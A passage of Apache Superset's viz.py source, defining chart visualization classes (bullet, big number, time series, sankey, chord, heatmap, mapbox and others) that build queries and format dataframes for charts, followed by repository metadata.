self.z_metric = form_data.get('size')
self.entity = form_data.get('entity')
self.series = form_data.get('series') or self.entity
d['row_limit'] = form_data.get('limit')
d['metrics'] = [
self.z_metric,
self.x_metric,
self.y_metric,
]
if not all(d['metrics'] + [self.entity]):
raise Exception(_("Pick a metric for x, y and size"))
return d
def get_data(self, df):
df['x'] = df[[self.x_metric]]
df['y'] = df[[self.y_metric]]
df['size'] = df[[self.z_metric]]
df['shape'] = 'circle'
df['group'] = df[[self.series]]
series = defaultdict(list)
for row in df.to_dict(orient='records'):
series[row['group']].append(row)
chart_data = []
for k, v in series.items():
chart_data.append({
'key': k,
'values': v})
return chart_data
class BulletViz(NVD3Viz):
"""Based on the NVD3 bullet chart"""
viz_type = "bullet"
verbose_name = _("Bullet Chart")
is_timeseries = False
def query_obj(self):
form_data = self.form_data
d = super(BulletViz, self).query_obj()
self.metric = form_data.get('metric')
def as_strings(field):
value = form_data.get(field)
return value.split(',') if value else []
def as_floats(field):
return [float(x) for x in as_strings(field)]
self.ranges = as_floats('ranges')
self.range_labels = as_strings('range_labels')
self.markers = as_floats('markers')
self.marker_labels = as_strings('marker_labels')
self.marker_lines = as_floats('marker_lines')
self.marker_line_labels = as_strings('marker_line_labels')
d['metrics'] = [
self.metric,
]
if not self.metric:
raise Exception(_("Pick a metric to display"))
return d
def get_data(self, df):
df = df.fillna(0)
df['metric'] = df[[self.metric]]
values = df['metric'].values
return {
'measures': values.tolist(),
'ranges': self.ranges or [0, values.max() * 1.1],
'rangeLabels': self.range_labels or None,
'markers': self.markers or None,
'markerLabels': self.marker_labels or None,
'markerLines': self.marker_lines or None,
'markerLineLabels': self.marker_line_labels or None,
}
class BigNumberViz(BaseViz):
"""Put emphasis on a single metric with this big number viz"""
viz_type = "big_number"
verbose_name = _("Big Number with Trendline")
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
is_timeseries = True
def query_obj(self):
d = super(BigNumberViz, self).query_obj()
metric = self.form_data.get('metric')
if not metric:
raise Exception(_("Pick a metric!"))
d['metrics'] = [self.form_data.get('metric')]
self.form_data['metric'] = metric
return d
def get_data(self, df):
form_data = self.form_data
df.sort_values(by=df.columns[0], inplace=True)
compare_lag = form_data.get("compare_lag")
return {
'data': df.values.tolist(),
'compare_lag': compare_lag,
'compare_suffix': form_data.get('compare_suffix', ''),
}
class BigNumberTotalViz(BaseViz):
"""Put emphasis on a single metric with this big number viz"""
viz_type = "big_number_total"
verbose_name = _("Big Number")
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
is_timeseries = False
def query_obj(self):
d = super(BigNumberTotalViz, self).query_obj()
metric = self.form_data.get('metric')
if not metric:
raise Exception(_("Pick a metric!"))
d['metrics'] = [self.form_data.get('metric')]
self.form_data['metric'] = metric
return d
def get_data(self, df):
form_data = self.form_data
df.sort_values(by=df.columns[0], inplace=True)
return {
'data': df.values.tolist(),
'subheader': form_data.get('subheader', ''),
}
class NVD3TimeSeriesViz(NVD3Viz):
"""A rich line chart component with tons of options"""
viz_type = "line"
verbose_name = _("Time Series - Line Chart")
sort_series = False
is_timeseries = True
def to_series(self, df, classed='', title_suffix=''):
cols = []
for col in df.columns:
if col == '':
cols.append('N/A')
elif col is None:
cols.append('NULL')
else:
cols.append(col)
df.columns = cols
series = df.to_dict('series')
chart_data = []
for name in df.T.index.tolist():
ys = series[name]
if df[name].dtype.kind not in "biufc":
continue
if isinstance(name, string_types):
series_title = name
else:
name = ["{}".format(s) for s in name]
if len(self.form_data.get('metrics')) > 1:
series_title = ", ".join(name)
else:
series_title = ", ".join(name[1:])
if title_suffix:
series_title += title_suffix
d = {
"key": series_title,
"classed": classed,
"values": [
{'x': ds, 'y': ys[ds] if ds in ys else None}
for ds in df.index
],
}
chart_data.append(d)
return chart_data
def process_data(self, df):
fd = self.form_data
df = df.fillna(0)
if fd.get("granularity") == "all":
raise Exception(_("Pick a time granularity for your time series"))
df = df.pivot_table(
index=DTTM_ALIAS,
columns=fd.get('groupby'),
values=fd.get('metrics'))
fm = fd.get("resample_fillmethod")
if not fm:
fm = None
how = fd.get("resample_how")
rule = fd.get("resample_rule")
if how and rule:
df = df.resample(rule, how=how, fill_method=fm)
if not fm:
df = df.fillna(0)
if self.sort_series:
dfs = df.sum()
dfs.sort_values(ascending=False, inplace=True)
df = df[dfs.index]
if fd.get("contribution"):
dft = df.T
df = (dft / dft.sum()).T
rolling_type = fd.get("rolling_type")
rolling_periods = int(fd.get("rolling_periods") or 0)
min_periods = int(fd.get("min_periods") or 0)
if rolling_type in ('mean', 'std', 'sum') and rolling_periods:
kwargs = dict(
arg=df,
window=rolling_periods,
min_periods=min_periods)
if rolling_type == 'mean':
df = pd.rolling_mean(**kwargs)
elif rolling_type == 'std':
df = pd.rolling_std(**kwargs)
elif rolling_type == 'sum':
df = pd.rolling_sum(**kwargs)
elif rolling_type == 'cumsum':
df = df.cumsum()
if min_periods:
df = df[min_periods:]
num_period_compare = fd.get("num_period_compare")
if num_period_compare:
num_period_compare = int(num_period_compare)
prt = fd.get('period_ratio_type')
if prt and prt == 'growth':
df = (df / df.shift(num_period_compare)) - 1
elif prt and prt == 'value':
df = df - df.shift(num_period_compare)
else:
df = df / df.shift(num_period_compare)
df = df[num_period_compare:]
return df
def get_data(self, df):
fd = self.form_data
df = self.process_data(df)
chart_data = self.to_series(df)
time_compare = fd.get('time_compare')
if time_compare:
query_object = self.query_obj()
delta = utils.parse_human_timedelta(time_compare)
query_object['inner_from_dttm'] = query_object['from_dttm']
query_object['inner_to_dttm'] = query_object['to_dttm']
query_object['from_dttm'] -= delta
query_object['to_dttm'] -= delta
df2 = self.get_df(query_object)
df2[DTTM_ALIAS] += delta
df2 = self.process_data(df2)
chart_data += self.to_series(
df2, classed='superset', title_suffix="---")
chart_data = sorted(chart_data, key=lambda x: x['key'])
return chart_data
class NVD3DualLineViz(NVD3Viz):
"""A rich line chart with dual axis"""
viz_type = "dual_line"
verbose_name = _("Time Series - Dual Axis Line Chart")
sort_series = False
is_timeseries = True
def query_obj(self):
d = super(NVD3DualLineViz, self).query_obj()
m1 = self.form_data.get('metric')
m2 = self.form_data.get('metric_2')
d['metrics'] = [m1, m2]
if not m1:
raise Exception(_("Pick a metric for left axis!"))
if not m2:
raise Exception(_("Pick a metric for right axis!"))
if m1 == m2:
raise Exception(_("Please choose different metrics"
" on left and right axis"))
return d
def to_series(self, df, classed=''):
cols = []
for col in df.columns:
if col == '':
cols.append('N/A')
elif col is None:
cols.append('NULL')
else:
cols.append(col)
df.columns = cols
series = df.to_dict('series')
chart_data = []
metrics = [
self.form_data.get('metric'),
self.form_data.get('metric_2')
]
for i, m in enumerate(metrics):
ys = series[m]
if df[m].dtype.kind not in "biufc":
continue
series_title = m
d = {
"key": series_title,
"classed": classed,
"values": [
{'x': ds, 'y': ys[ds] if ds in ys else None}
for ds in df.index
],
"yAxis": i+1,
"type": "line"
}
chart_data.append(d)
return chart_data
def get_data(self, df):
fd = self.form_data
df = df.fillna(0)
if self.form_data.get("granularity") == "all":
raise Exception(_("Pick a time granularity for your time series"))
metric = fd.get('metric')
metric_2 = fd.get('metric_2')
df = df.pivot_table(
index=DTTM_ALIAS,
values=[metric, metric_2])
chart_data = self.to_series(df)
return chart_data
class NVD3TimeSeriesBarViz(NVD3TimeSeriesViz):
"""A bar chart where the x axis is time"""
viz_type = "bar"
sort_series = True
verbose_name = _("Time Series - Bar Chart")
class NVD3CompareTimeSeriesViz(NVD3TimeSeriesViz):
"""A line chart component where you can compare the % change over time"""
viz_type = 'compare'
verbose_name = _("Time Series - Percent Change")
class NVD3TimeSeriesStackedViz(NVD3TimeSeriesViz):
"""A rich stack area chart"""
viz_type = "area"
verbose_name = _("Time Series - Stacked")
sort_series = True
class DistributionPieViz(NVD3Viz):
"""Annoy visualization snobs with this controversial pie chart"""
viz_type = "pie"
verbose_name = _("Distribution - NVD3 - Pie Chart")
is_timeseries = False
def get_data(self, df):
df = df.pivot_table(
index=self.groupby,
values=[self.metrics[0]])
df.sort_values(by=self.metrics[0], ascending=False, inplace=True)
df = df.reset_index()
df.columns = ['x', 'y']
return df.to_dict(orient="records")
class HistogramViz(BaseViz):
"""Histogram"""
viz_type = "histogram"
verbose_name = _("Histogram")
is_timeseries = False
def query_obj(self):
"""Returns the query object for this visualization"""
d = super(HistogramViz, self).query_obj()
d['row_limit'] = self.form_data.get(
'row_limit', int(config.get('VIZ_ROW_LIMIT')))
numeric_column = self.form_data.get('all_columns_x')
if numeric_column is None:
raise Exception(_("Must have one numeric column specified"))
d['columns'] = [numeric_column]
return d
def get_data(self, df):
"""Returns the chart data"""
chart_data = df[df.columns[0]].values.tolist()
return chart_data
class DistributionBarViz(DistributionPieViz):
"""A good old bar chart"""
viz_type = "dist_bar"
verbose_name = _("Distribution - Bar Chart")
is_timeseries = False
def query_obj(self):
d = super(DistributionBarViz, self).query_obj() # noqa
fd = self.form_data
if (
len(d['groupby']) <
len(fd.get('groupby') or []) + len(fd.get('columns') or [])
):
raise Exception(
_("Can't have overlap between Series and Breakdowns"))
if not fd.get('metrics'):
raise Exception(_("Pick at least one metric"))
if not fd.get('groupby'):
raise Exception(_("Pick at least one field for [Series]"))
return d
def get_data(self, df):
fd = self.form_data
row = df.groupby(self.groupby).sum()[self.metrics[0]].copy()
row.sort_values(ascending=False, inplace=True)
columns = fd.get('columns') or []
pt = df.pivot_table(
index=self.groupby,
columns=columns,
values=self.metrics)
if fd.get("contribution"):
pt = pt.fillna(0)
pt = pt.T
pt = (pt / pt.sum()).T
pt = pt.reindex(row.index)
chart_data = []
for name, ys in pt.iteritems():
if pt[name].dtype.kind not in "biufc" or name in self.groupby:
continue
if isinstance(name, string_types):
series_title = name
elif len(self.metrics) > 1:
series_title = ", ".join(name)
else:
l = [str(s) for s in name[1:]]
series_title = ", ".join(l)
values = []
for i, v in ys.iteritems():
x = i
if isinstance(x, (tuple, list)):
x = ', '.join([str(s) for s in x])
else:
x = str(x)
values.append({
'x': x,
'y': v,
})
d = {
"key": series_title,
"values": values,
}
chart_data.append(d)
return chart_data
class SunburstViz(BaseViz):
"""A multi level sunburst chart"""
viz_type = "sunburst"
verbose_name = _("Sunburst")
is_timeseries = False
credits = (
'Kerry Rodden '
'@<a href="https://bl.ocks.org/kerryrodden/7090426">bl.ocks.org</a>')
def get_data(self, df):
# if m1 == m2 duplicate the metric column
cols = self.form_data.get('groupby')
metric = self.form_data.get('metric')
secondary_metric = self.form_data.get('secondary_metric')
if metric == secondary_metric:
ndf = df
ndf.columns = [cols + ['m1', 'm2']]
else:
cols += [
self.form_data['metric'], self.form_data['secondary_metric']]
ndf = df[cols]
return json.loads(ndf.to_json(orient="values")) # TODO fix this nonsense
def query_obj(self):
qry = super(SunburstViz, self).query_obj()
qry['metrics'] = [
self.form_data['metric'], self.form_data['secondary_metric']]
return qry
class SankeyViz(BaseViz):
"""A Sankey diagram that requires a parent-child dataset"""
viz_type = "sankey"
verbose_name = _("Sankey")
is_timeseries = False
credits = '<a href="https://www.npmjs.com/package/d3-sankey">d3-sankey on npm</a>'
def query_obj(self):
qry = super(SankeyViz, self).query_obj()
if len(qry['groupby']) != 2:
raise Exception(_("Pick exactly 2 columns as [Source / Target]"))
qry['metrics'] = [
self.form_data['metric']]
return qry
def get_data(self, df):
df.columns = ['source', 'target', 'value']
recs = df.to_dict(orient='records')
hierarchy = defaultdict(set)
for row in recs:
hierarchy[row['source']].add(row['target'])
def find_cycle(g):
"""Whether there's a cycle in a directed graph"""
path = set()
def visit(vertex):
path.add(vertex)
for neighbour in g.get(vertex, ()):
if neighbour in path or visit(neighbour):
return (vertex, neighbour)
path.remove(vertex)
for v in g:
cycle = visit(v)
if cycle:
return cycle
cycle = find_cycle(hierarchy)
if cycle:
raise Exception(_(
"There's a loop in your Sankey, please provide a tree. "
"Here's a faulty link: {}").format(cycle))
return recs
class DirectedForceViz(BaseViz):
"""An animated directed force layout graph visualization"""
viz_type = "directed_force"
verbose_name = _("Directed Force Layout")
credits = 'd3noob @<a href="http://bl.ocks.org/d3noob/5141278">bl.ocks.org</a>'
is_timeseries = False
def query_obj(self):
qry = super(DirectedForceViz, self).query_obj()
if len(self.form_data['groupby']) != 2:
raise Exception(_("Pick exactly 2 columns to 'Group By'"))
qry['metrics'] = [self.form_data['metric']]
return qry
def get_data(self, df):
df.columns = ['source', 'target', 'value']
return df.to_dict(orient='records')
class ChordViz(BaseViz):
"""A Chord diagram"""
viz_type = "chord"
verbose_name = _("Directed Force Layout")
credits = '<a href="https://github.com/d3/d3-chord">Bostock</a>'
is_timeseries = False
def query_obj(self):
qry = super(ChordViz, self).query_obj()
fd = self.form_data
qry['groupby'] = [fd.get('groupby'), fd.get('columns')]
qry['metrics'] = [fd.get('metric')]
return qry
def get_data(self, df):
df.columns = ['source', 'target', 'value']
# Preparing a symetrical matrix like d3.chords calls for
nodes = list(set(df['source']) | set(df['target']))
matrix = {}
for source, target in product(nodes, nodes):
matrix[(source, target)] = 0
for source, target, value in df.to_records(index=False):
matrix[(source, target)] = value
m = [[matrix[(n1, n2)] for n1 in nodes] for n2 in nodes]
return {
'nodes': list(nodes),
'matrix': m,
}
class CountryMapViz(BaseViz):
"""A country centric"""
viz_type = "country_map"
verbose_name = _("Country Map")
is_timeseries = False
credits = 'From bl.ocks.org By john-guerra'
def query_obj(self):
qry = super(CountryMapViz, self).query_obj()
qry['metrics'] = [
self.form_data['metric']]
qry['groupby'] = [self.form_data['entity']]
return qry
def get_data(self, df):
fd = self.form_data
cols = [fd.get('entity')]
metric = fd.get('metric')
cols += [metric]
ndf = df[cols]
df = ndf
df.columns = ['country_id', 'metric']
d = df.to_dict(orient='records')
return d
class WorldMapViz(BaseViz):
"""A country centric world map"""
viz_type = "world_map"
verbose_name = _("World Map")
is_timeseries = False
credits = 'datamaps on <a href="https://www.npmjs.com/package/datamaps">npm</a>'
def query_obj(self):
qry = super(WorldMapViz, self).query_obj()
qry['metrics'] = [
self.form_data['metric'], self.form_data['secondary_metric']]
qry['groupby'] = [self.form_data['entity']]
return qry
def get_data(self, df):
from superset.data import countries
fd = self.form_data
cols = [fd.get('entity')]
metric = fd.get('metric')
secondary_metric = fd.get('secondary_metric')
if metric == secondary_metric:
ndf = df[cols]
# df[metric] will be a DataFrame
# because there are duplicate column names
ndf['m1'] = df[metric].iloc[:, 0]
ndf['m2'] = ndf['m1']
else:
cols += [metric, secondary_metric]
ndf = df[cols]
df = ndf
df.columns = ['country', 'm1', 'm2']
d = df.to_dict(orient='records')
for row in d:
country = None
if isinstance(row['country'], string_types):
country = countries.get(
fd.get('country_fieldtype'), row['country'])
if country:
row['country'] = country['cca3']
row['latitude'] = country['lat']
row['longitude'] = country['lng']
row['name'] = country['name']
else:
row['country'] = "XXX"
return d
class FilterBoxViz(BaseViz):
"""A multi filter, multi-choice filter box to make dashboards interactive"""
viz_type = "filter_box"
verbose_name = _("Filters")
is_timeseries = False
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
def query_obj(self):
qry = super(FilterBoxViz, self).query_obj()
groupby = self.form_data.get('groupby')
if len(groupby) < 1 and not self.form_data.get('date_filter'):
raise Exception(_("Pick at least one filter field"))
qry['metrics'] = [
self.form_data['metric']]
return qry
def get_data(self, df):
qry = self.query_obj()
filters = [g for g in self.form_data['groupby']]
d = {}
for flt in filters:
qry['groupby'] = [flt]
df = super(FilterBoxViz, self).get_df(qry)
d[flt] = [{
'id': row[0],
'text': row[0],
'filter': flt,
'metric': row[1]}
for row in df.itertuples(index=False)
]
return d
class IFrameViz(BaseViz):
"""You can squeeze just about anything in this iFrame component"""
viz_type = "iframe"
verbose_name = _("iFrame")
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
is_timeseries = False
def get_df(self):
return None
class ParallelCoordinatesViz(BaseViz):
"""Interactive parallel coordinate implementation
Uses this amazing javascript library
https://github.com/syntagmatic/parallel-coordinates
"""
viz_type = "para"
verbose_name = _("Parallel Coordinates")
credits = (
'<a href="https://syntagmatic.github.io/parallel-coordinates/">'
'Syntagmatic\'s library</a>')
is_timeseries = False
def query_obj(self):
d = super(ParallelCoordinatesViz, self).query_obj()
fd = self.form_data
d['metrics'] = copy.copy(fd.get('metrics'))
second = fd.get('secondary_metric')
if second not in d['metrics']:
d['metrics'] += [second]
d['groupby'] = [fd.get('series')]
return d
def get_data(self, df):
return df.to_dict(orient="records")
class HeatmapViz(BaseViz):
"""A nice heatmap visualization that support high density through canvas"""
viz_type = "heatmap"
verbose_name = _("Heatmap")
is_timeseries = False
credits = (
'inspired from mbostock @<a href="http://bl.ocks.org/mbostock/3074470">'
'bl.ocks.org</a>')
def query_obj(self):
d = super(HeatmapViz, self).query_obj()
fd = self.form_data
d['metrics'] = [fd.get('metric')]
d['groupby'] = [fd.get('all_columns_x'), fd.get('all_columns_y')]
return d
def get_data(self, df):
fd = self.form_data
x = fd.get('all_columns_x')
y = fd.get('all_columns_y')
v = fd.get('metric')
if x == y:
df.columns = ['x', 'y', 'v']
else:
df = df[[x, y, v]]
df.columns = ['x', 'y', 'v']
norm = fd.get('normalize_across')
overall = False
max_ = df.v.max()
min_ = df.v.min()
bounds = fd.get('y_axis_bounds')
if bounds and bounds[0] is not None:
min_ = bounds[0]
if bounds and bounds[1] is not None:
max_ = bounds[1]
if norm == 'heatmap':
overall = True
else:
gb = df.groupby(norm, group_keys=False)
if len(gb) <= 1:
overall = True
else:
df['perc'] = (
gb.apply(
lambda x: (x.v - x.v.min()) / (x.v.max() - x.v.min()))
)
if overall:
df['perc'] = (df.v - min_) / (max_ - min_)
return {
'records': df.to_dict(orient="records"),
'extents': [min_, max_],
}
class HorizonViz(NVD3TimeSeriesViz):
"""Horizon chart
https://www.npmjs.com/package/d3-horizon-chart
"""
viz_type = "horizon"
verbose_name = _("Horizon Charts")
credits = (
'<a href="https://www.npmjs.com/package/d3-horizon-chart">'
'd3-horizon-chart</a>')
class MapboxViz(BaseViz):
"""Rich maps made with Mapbox"""
viz_type = "mapbox"
verbose_name = _("Mapbox")
is_timeseries = False
credits = (
'<a href=https://www.mapbox.com/mapbox-gl-js/api/>Mapbox GL JS</a>')
def query_obj(self):
d = super(MapboxViz, self).query_obj()
fd = self.form_data
label_col = fd.get('mapbox_label')
if not fd.get('groupby'):
d['columns'] = [fd.get('all_columns_x'), fd.get('all_columns_y')]
if label_col and len(label_col) >= 1:
if label_col[0] == "count":
raise Exception(_(
"Must have a [Group By] column to have 'count' as the [Label]"))
d['columns'].append(label_col[0])
if fd.get('point_radius') != 'Auto':
d['columns'].append(fd.get('point_radius'))
d['columns'] = list(set(d['columns']))
else:
# Ensuring columns chosen are all in group by
if (label_col and len(label_col) >= 1 and
label_col[0] != "count" and
label_col[0] not in fd.get('groupby')):
raise Exception(_(
"Choice of [Label] must be present in [Group By]"))
if (fd.get("point_radius") != "Auto" and
fd.get("point_radius") not in fd.get('groupby')):
raise Exception(_(
"Choice of [Point Radius] must be present in [Group By]"))
if (fd.get('all_columns_x') not in fd.get('groupby') or
fd.get('all_columns_y') not in fd.get('groupby')):
raise Exception(_(
"[Longitude] and [Latitude] columns must be present in [Group By]"))
return d
def get_data(self, df):
fd = self.form_data
label_col = fd.get('mapbox_label')
custom_metric = label_col and len(label_col) >= 1
metric_col = [None] * len(df.index)
if custom_metric:
if label_col[0] == fd.get('all_columns_x'):
metric_col = df[fd.get('all_columns_x')]
elif label_col[0] == fd.get('all_columns_y'):
metric_col = df[fd.get('all_columns_y')]
else:
metric_col = df[label_col[0]]
point_radius_col = (
[None] * len(df.index)
if fd.get("point_radius") == "Auto"
else df[fd.get("point_radius")])
# using geoJSON formatting
geo_json = {
"type": "FeatureCollection",
"features": [
{
"type": "Feature",
"properties": {
"metric": metric,
"radius": point_radius,
},
"geometry": {
"type": "Point",
"coordinates": [lon, lat],
}
}
for lon, lat, metric, point_radius
in zip(
df[fd.get('all_columns_x')],
df[fd.get('all_columns_y')],
metric_col, point_radius_col)
]
}
return {
"geoJSON": geo_json,
"customMetric": custom_metric,
"mapboxApiKey": config.get('MAPBOX_API_KEY'),
"mapStyle": fd.get("mapbox_style"),
"aggregatorName": fd.get("pandas_aggfunc"),
"clusteringRadius": fd.get("clustering_radius"),
"pointRadiusUnit": fd.get("point_radius_unit"),
"globalOpacity": fd.get("global_opacity"),
"viewportLongitude": fd.get("viewport_longitude"),
"viewportLatitude": fd.get("viewport_latitude"),
"viewportZoom": fd.get("viewport_zoom"),
"renderWhileDragging": fd.get("render_while_dragging"),
"tooltip": fd.get("rich_tooltip"),
"color": fd.get("mapbox_color"),
}
class EventFlowViz(BaseViz):
"""A visualization to explore patterns in event sequences"""
viz_type = "event_flow"
verbose_name = _("Event flow")
credits = 'from <a href="https://github.com/williaster/data-ui">@data-ui</a>'
is_timeseries = True
def query_obj(self):
query = super(EventFlowViz, self).query_obj()
form_data = self.form_data
event_key = form_data.get('all_columns_x')
entity_key = form_data.get('entity')
meta_keys = [
col for col in form_data.get('all_columns') if col != event_key and col != entity_key
]
query['columns'] = [event_key, entity_key] + meta_keys
if form_data['order_by_entity']:
query['orderby'] = [(entity_key, True)]
return query
def get_data(self, df):
return df.to_dict(orient="records")
viz_types_list = [
TableViz,
PivotTableViz,
NVD3TimeSeriesViz,
NVD3DualLineViz,
NVD3CompareTimeSeriesViz,
NVD3TimeSeriesStackedViz,
NVD3TimeSeriesBarViz,
DistributionBarViz,
DistributionPieViz,
BubbleViz,
BulletViz,
MarkupViz,
WordCloudViz,
BigNumberViz,
BigNumberTotalViz,
SunburstViz,
DirectedForceViz,
SankeyViz,
CountryMapViz,
ChordViz,
WorldMapViz,
FilterBoxViz,
IFrameViz,
ParallelCoordinatesViz,
HeatmapViz,
BoxPlotViz,
TreemapViz,
CalHeatmapViz,
HorizonViz,
MapboxViz,
HistogramViz,
SeparatorViz,
EventFlowViz,
]
viz_types = OrderedDict([(v.viz_type, v) for v in viz_types_list
if v.viz_type not in config.get('VIZ_TYPE_BLACKLIST')])
|
FrederichCheng/incubator-superset
|
superset/viz.py
|
Python
|
apache-2.0
| 55,055
|
[
"VisIt"
] |
a61b29d16139c6d5de9ae1b30336d67fe776653fd60187ba4f042f395971d931
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.